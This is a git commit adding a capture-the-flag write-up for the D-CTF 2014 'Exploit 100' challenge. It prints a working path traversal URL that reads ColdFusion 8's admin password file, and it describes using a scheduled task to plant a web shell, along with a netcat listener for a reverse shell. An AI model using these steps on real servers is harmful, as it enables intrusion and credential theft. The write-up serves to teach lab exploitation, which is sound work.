D-CTF 2014: add Exploit 100 write-up

flexd · mathiasbynens · commit 27e151b60a68 · 2014-10-20T14:49:29.000+02:00
Closes ctfs#176.
diff --git a/d-ctf-2014/README.md b/d-ctf-2014/README.md
@@ -5,6 +5,7 @@
 
 ## Completed write-ups
 
+* [Exploit 100](exploit-100)
 * [Exploit 300](exploit-300)
 * [Misc 100](misc-100)
 * [Misc 200](misc-200)
@@ -20,7 +21,6 @@
 
 * [Bonus 100](bonus-100)
 * [Bonus 200](bonus-200)
-* [Exploit 100](exploit-100)
 * [Exploit 200](exploit-200)
 * [Exploit 400](exploit-400)
 * [Misc 400](misc-400)
diff --git a/d-ctf-2014/exploit-100/README.md b/d-ctf-2014/exploit-100/README.md
@@ -8,7 +8,25 @@
 
 ## Write-up
 
-(TODO)
+Exploit the local path inclusion vulnerability in the ColdFusion admin panel:
+
+```
+http://10.11.1.2/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
+```
+
+This gets you an MD5 hash, which is the hash of the password `~Coldfusion`.
+
+Now you can use the ColdFusion admin panel to add a ‘scheduled task’ to fetch your JSP/PHP/CFM shell and put it in a web-exposed directory. We used [a simple reverse shell](http://pastebin.com/09gpcxWL) in combination with `nc -v -n -l -p 4444`.
+
+Once you have a shell, start digging. The flag is in `C:\Documents and Settings\admin\Desktop\paranoia.jpg` and looks like this:
+
+![](paranoia.jpg)
+
+The file name hints at [`paranoia.jar`](https://ccrma.stanford.edu/~eberdahl/Projects/Paranoia/) which is a steganography tool. Using that tool (or another stenography tool) with the provided image and the key `That's the most evilest thing I can imagine.` we find the flag:
+
+```
+The Cold War is over but Cold War thinking survives.
+```
 
 ## Other write-ups and resources
 
diff --git a/d-ctf-2014/exploit-100/paranoia.jpg b/d-ctf-2014/exploit-100/paranoia.jpg
